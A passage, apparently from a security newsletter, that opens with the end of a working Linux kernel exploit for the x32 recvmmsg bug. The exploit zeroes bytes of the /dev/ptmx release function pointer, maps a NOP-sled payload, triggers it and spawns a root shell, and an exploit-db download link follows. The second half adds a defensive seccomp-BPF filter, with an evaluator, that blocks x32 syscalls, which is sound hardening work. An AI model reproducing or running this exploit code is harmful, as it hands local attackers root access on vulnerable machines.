    /*
     * start a separate process to send a udp message after 255 seconds
     * so the syscall returns, but not after updating the timeout struct
     * and writing the remaining time into it.
     * 0xff - 255 seconds = 0x00
     */
    printf("clearing byte at 0x%lx\n", addr);
    pid = fork();
    if (pid == 0) {
        memset(buf, 0x41, BUFSIZE);

        if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
            perror("socket()");
            exit(EXIT_FAILURE);
        }

        sa.sin_family      = AF_INET;
        sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        sa.sin_port        = htons(port);

        printf("waiting 255 seconds...\n");
        for (i = 0; i < 255; i++) {
            if (i % 10 == 0)
                printf("%is/255s\n", i);
            sleep(1);
        }

        printf("waking up parent...\n");
        sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));
        exit(EXIT_SUCCESS);
    } else if (pid > 0) {
        retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr);
        if (retval == -1) {
            printf("address can't be written to, not a valid timespec struct\n");
            exit(EXIT_FAILURE);
        }
        waitpid(pid, 0, 0);
        printf("byte zeroed out\n");
    } else {
      perror("fork()");
      exit(EXIT_FAILURE);
    }
}

int main(int argc, char** argv)
{
    long code, target;
    int pwn;

    /* Prepare payload... */
    printf("preparing payload buffer...\n");
    code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL),
PAYLOADSIZE, 7, 0x32, 0, 0);
    memset((void*)code, 0x90, PAYLOADSIZE);
    code += PAYLOADSIZE - 1024;
    memcpy((void*)code, &kernel_payload, 1024);

    /*
     * Now clear the three most significant bytes of the fops pointer
     * to the release function.
     * This will make it point into the memory region mapped above.
     */
    printf("changing kernel pointer to point into controlled buffer...\n");
    target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
    zero_out(target + 7);
    zero_out(target + 6);
    zero_out(target + 5);

    /* ... and trigger. */
    printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
    pwn = open("/dev/ptmx", 'r');
    close(pwn);

    if (getuid() != 0) {
        printf("failed to get root :(\n");
        exit(EXIT_FAILURE);
    }

    printf("got root, enjoy :)\n");
    return execl("/bin/bash", "-sh", NULL);
}


*Download Exploit Linux 3.4+ Arbitrary <http://www.exploit-db.com/download/31346>*
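Both exploits above reach the vulnerable recvmmsg handler through the x32 ABI (the __X32_SYSCALL_BIT entry point), which is why the bug is only reachable on kernels built with CONFIG_X86_X32=y. Where rebuilding the kernel without that option is not possible, a seccomp-BPF policy that refuses any syscall with the x32 bit set closes this entire path for the process it is installed in. The program below is an added example, not code from the newsletter or from either exploit author: it builds such a policy, includes a small offline evaluator for the four classic-BPF instruction forms the policy uses so the verdicts can be checked before installation, and installs the policy with prctl on Linux. The struct layouts and constant values (AUDIT_ARCH_X86_64, the SECCOMP_RET_* verdicts, the BPF opcode fields) are the kernel's UAPI values, copied in so the file builds without the linux/*.h headers; 299 is assumed to be the native x86_64 recvmmsg number, and 537 is the x32 number taken from the exploits.

```c
/*
 * Added example (not code from the newsletter or from either exploit author):
 * a seccomp-BPF policy that refuses any syscall issued through the x32 ABI,
 * plus a small offline evaluator so the policy can be checked before it is
 * installed. Struct layouts and constants are the classic-BPF / seccomp UAPI
 * values, copied here so the file builds without the linux/*.h headers.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef __linux__
#include <sys/prctl.h>   /* PR_SET_NO_NEW_PRIVS, PR_SET_SECCOMP */
#endif

#define X32_SYSCALL_BIT     0x40000000u  /* same value as __X32_SYSCALL_BIT in the exploits */
#define AUDIT_ARCH_X86_64   0xc000003eu  /* EM_X86_64 | __AUDIT_ARCH_64BIT | __AUDIT_ARCH_LE */
#define SECCOMP_RET_KILL    0x00000000u  /* kill the calling thread */
#define SECCOMP_RET_ALLOW   0x7fff0000u
#define SECCOMP_MODE_FILTER 2

/* classic BPF opcode fields, as in linux/filter.h */
#define BPF_LD   0x00
#define BPF_JMP  0x05
#define BPF_RET  0x06
#define BPF_W    0x00
#define BPF_ABS  0x20
#define BPF_K    0x00
#define BPF_JEQ  0x10
#define BPF_JSET 0x40

struct sock_filter  { uint16_t code; uint8_t jt; uint8_t jf; uint32_t k; };
struct sock_fprog   { unsigned short len; struct sock_filter *filter; };
struct seccomp_data { int nr; uint32_t arch; uint64_t instruction_pointer; uint64_t args[6]; };
#define STMT(code, k)         { (uint16_t)(code), 0, 0, (uint32_t)(k) }
#define JUMP(code, k, jt, jf) { (uint16_t)(code), (uint8_t)(jt), (uint8_t)(jf), (uint32_t)(k) }

/* Policy: kill on a foreign arch, kill if the x32 bit is set, allow everything else. */
static struct sock_filter deny_x32_filter[] = {
    STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
    JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),  /* native arch: skip the kill */
    STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
    JUMP(BPF_JMP | BPF_JSET | BPF_K, X32_SYSCALL_BIT, 0, 1),  /* x32 bit set: fall into the kill */
    STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),
    STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
};
#define DENY_X32_LEN (sizeof deny_x32_filter / sizeof deny_x32_filter[0])

/* Evaluator for the four instruction forms the policy uses; anything else fails closed. */
uint32_t run_filter(const struct sock_filter *f, size_t n, const struct seccomp_data *d)
{
    uint32_t a = 0;   /* the BPF accumulator */
    size_t pc = 0;
    while (pc < n) {
        const struct sock_filter *ins = &f[pc];
        switch (ins->code) {
        case BPF_LD | BPF_W | BPF_ABS:      /* A = 32-bit word at offset k of seccomp_data */
            if (ins->k + 4 > sizeof *d) return SECCOMP_RET_KILL;
            memcpy(&a, (const unsigned char *)d + ins->k, 4);
            pc++;
            break;
        case BPF_JMP | BPF_JEQ | BPF_K:     /* conditional skip on A == k */
            pc += 1 + (a == ins->k ? ins->jt : ins->jf);
            break;
        case BPF_JMP | BPF_JSET | BPF_K:    /* conditional skip on (A & k) != 0 */
            pc += 1 + ((a & ins->k) ? ins->jt : ins->jf);
            break;
        case BPF_RET | BPF_K:
            return ins->k;
        default:
            return SECCOMP_RET_KILL;
        }
    }
    return SECCOMP_RET_KILL;
}

/* Verdict the policy gives for one (arch, syscall number) pair. */
uint32_t verdict(uint32_t arch, int nr)
{
    struct seccomp_data d;
    memset(&d, 0, sizeof d);
    d.arch = arch;
    d.nr = nr;
    return run_filter(deny_x32_filter, DENY_X32_LEN, &d);
}

int main(void)
{
    /* 299: native x86_64 recvmmsg (assumed); 0x40000000 + 537: the x32 entry the exploits call */
    printf("native recvmmsg: %s\n", verdict(AUDIT_ARCH_X86_64, 299) == SECCOMP_RET_ALLOW ? "allow" : "kill");
    printf("x32 recvmmsg:    %s\n", verdict(AUDIT_ARCH_X86_64, (int)(X32_SYSCALL_BIT + 537)) == SECCOMP_RET_ALLOW ? "allow" : "kill");
#ifdef __linux__
    struct sock_fprog prog = { (unsigned short)DENY_X32_LEN, deny_x32_filter };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == 0 && prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) == 0)
        printf("policy installed: any x32 syscall now kills this process\n");
    else
        perror("seccomp install failed");
#endif
    return 0;
}
```

The arch check comes first because seccomp filters see every ABI a process can switch to; without it a filter that only inspects the number would let an i386-ABI call with a colliding number through. Once installed, the filter is inherited by children and cannot be removed, so it belongs at the start of a service's main() or in its sandbox setup, not in an interactive shell.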